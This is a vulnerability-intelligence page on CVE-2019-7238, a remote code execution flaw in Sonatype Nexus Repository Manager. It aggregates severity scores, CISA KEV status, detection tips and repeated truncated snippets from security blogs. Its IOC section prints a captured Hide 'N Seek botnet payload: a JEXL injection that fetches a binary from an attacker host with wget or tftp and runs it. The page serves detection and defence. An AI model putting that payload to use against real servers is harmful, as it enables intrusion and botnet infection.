CVE-2019-7238
published 2019-03-21CVE-2019-7238: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-06-10
Exploited in the wild
EPSS
76.53%
99.5th percentile
Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonatype | nexus_repository_manager | >= 3.0.0 < 3.15.0 | 3.15.0 |
Detection & IOCsextracted from sources · hover to see the quote
command{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName(',27h,'java.lang.Runtime',27h,').getRuntime().exec(['flock','-w','0','/tmp/l%N','sh','-c','(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)&&chmod 777 %N&&./%N a%J a%J',27h,'])"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}↗
bytes↗
XOR key 0x87, cumulative byte-wise XOR string encryption
- →Exploit traffic targets POST /service/extdirect with Content-Type: application/json; payload sets action=coreui_Component, method=previewAssets, filter property=expression with type=jexl — detect this combination in HTTP request bodies to identify CVE-2019-7238 exploitation attempts. ↗
- →The exploit payload uses JEXL expression injection via the 'expression' filter property with type 'jexl' in the previewAssets ExtDirect call; look for 'java.lang.Runtime' or 'getRuntime().exec' strings inside JSON POST bodies to /service/extdirect. ↗
- →Hide 'N Seek botnet samples use a cumulative byte-wise XOR with key 0x87 for string obfuscation; use this decryption scheme when reverse-engineering captured samples. ↗
- →Trend Micro Deep Security DPI rule 1009553 and TippingPoint MainlineDV filter 34706 can be used to detect/block CVE-2019-7238 exploitation traffic. ↗
- ·The exploit payload template uses format specifiers (%J, %T, %N, %I) as placeholders for attacker-controlled values (host, filename, IP, etc.); actual observed payloads will have these substituted with real infrastructure values. ↗
- ·Hard-coded P2P peer IPs and ports for this Hide 'N Seek variant are hosted externally on Palo Alto's GitHub page and are not reproduced inline in the article; consult that resource for the full peer list. ↗
- ·Exploitation requires at least one file to exist in any repository on the target NXRM 3 instance; a completely empty repository manager may not be exploitable. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa7.5HIGH
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4rg3-754f-rcrq: Sonatype Nexus Repository Manager before 3
ghsa_unreviewed·2022-05-13
CVE-2019-7238 [CRITICAL] GHSA-4rg3-754f-rcrq: Sonatype Nexus Repository Manager before 3
Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
GHSA
HTTP Request Smuggling in Netty
ghsa·2020-02-21·CVSS 7.5
CVE-2020-7238 [HIGH] CWE-444 HTTP Request Smuggling in Netty
HTTP Request Smuggling in Netty
Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. This issue exists because of an incomplete fix for CVE-2019-16869.
VulnCheck
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-7238 [CRITICAL] Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Sonatype Nexus Repository Manager before 3.15.0 has an incorrect access control vulnerability. Exploitation allows for remote code execution.
Affected: Sonatype Nexus Repository
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/; https://cujo.com/the-sysrv-botnet-and-how-it-evolved/; https://ww
CISA
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
cisa·2021-12-10·CVSS 9.8
CVE-2019-7238 [CRITICAL] Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Vulnerability: Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Affected: Sonatype Nexus Repository Manager
Sonatype Nexus Repository Manager before 3.15.0 has an incorrect access control vulnerability. Exploitation allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-7238
Remediation Due Date: 2022-06-10
No detection rules found.
Nuclei
Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-7238 [CRITICAL] Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
Template:
id: CVE-2019-7238
info:
name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade Sonatype Nexus Repository Manager to a version higher than 3.15.0.
reference:
- https://github.com/jas502n/CVE-2019-7238
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Contr
Tenable
WatchBog Malware Adds BlueKeep Scanner (CVE-2019-0708), New Exploits (CVE-2019-10149, CVE-2019-11581)
blogs_tenable·2019-07-25·CVSS 9.8
[CRITICAL] WatchBog Malware Adds BlueKeep Scanner (CVE-2019-0708), New Exploits (CVE-2019-10149, CVE-2019-11581)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
blogs_unit42·2019-06-12·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Threat Research Center
Threat Research
Vulnerabilities
## Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Ruchna Nigam
Published: June 12, 2019
Threat Research
Vulnerabilities
CVE-2018-20062
CVE-2019-7238
Exploits
HideNSeek
IoT
Linux
ThinkPHP
Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets Thin
Unit42
Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
blogs_unit42·2019-06-12·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets ThinkPHP installations, and CVE-2019-7238, a Remote Code Execution (RCE) vulnerability in Sonatype Nexus Repository Manager (NXRM) 3 software installations.
While the ThinkPHP exploit has already been seen employed by several Mirai variants, the only other instance of the CVE-2019-7238 vulnerability being ex
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Sfruttamento vulnerabilità
## CVE-2019-7238: RCE in Sonatype NXRM 3
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers to manage software components required for software development and more.
By: Govind Sarda, Raghvendra Mishra Mar 14, 2019 Read time: ( words)
Save to Folio
A critical remote code execution (RCE) vulnerability ( CVE-2019-7238 ) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,000
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Exploits y vulnerabilidades
## CVE-2019-7238: RCE in Sonatype NXRM 3
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers to manage software components required for software development and more.
By: Govind Sarda, Raghvendra Mishra Mar 14, 2019 Read time: ( words)
Save to Folio
A critical remote code execution (RCE) vulnerability ( CVE-2019-7238 ) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,00
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Ausnutzung von Schwachstellen
## CVE-2019-7238: RCE in Sonatype NXRM 3
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers to manage software components required for software development and more.
By: Govind Sarda, Raghvendra Mishra Mar 14, 2019 Read time: ( words)
Save to Folio
A critical remote code execution (RCE) vulnerability ( CVE-2019-7238 ) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Exploits & Vulnerabilities
# CVE-2019-7238: RCE in Sonatype NXRM 3
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers to manage software components required for software development and more.
By: Govind Sarda, Raghvendra Mishra
Mar 14, 2019
Read time: ( words)
Save to Folio
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,000 a
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Exploits & Vulnerabilities
## CVE-2019-7238: RCE in Sonatype NXRM 3
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers to manage software components required for software development and more.
By: Govind Sarda, Raghvendra Mishra Mar 14, 2019 Read time: ( words)
Save to Folio
A critical remote code execution (RCE) vulnerability ( CVE-2019-7238 ) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,000
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Exploits & Vulnerabilities
# CVE-2019-7238: RCE in Sonatype NXRM 3
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers to manage software components required for software development and more.
By: Govind Sarda, Raghvendra Mishra
2019/03/14
Read time: ( words)
Save to Folio
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,000 act
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Exploits & Vulnerabilities
## CVE-2019-7238: RCE in Sonatype NXRM 3
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers to manage software components required for software development and more.
By: Govind Sarda, Raghvendra Mishra 2019/03/14 Read time: ( words)
Save to Folio
A critical remote code execution (RCE) vulnerability ( CVE-2019-7238 ) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,000 a
https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-7238
2019-03-21
Published
2021-12-10
Added to CISA KEV
Exploited in the wild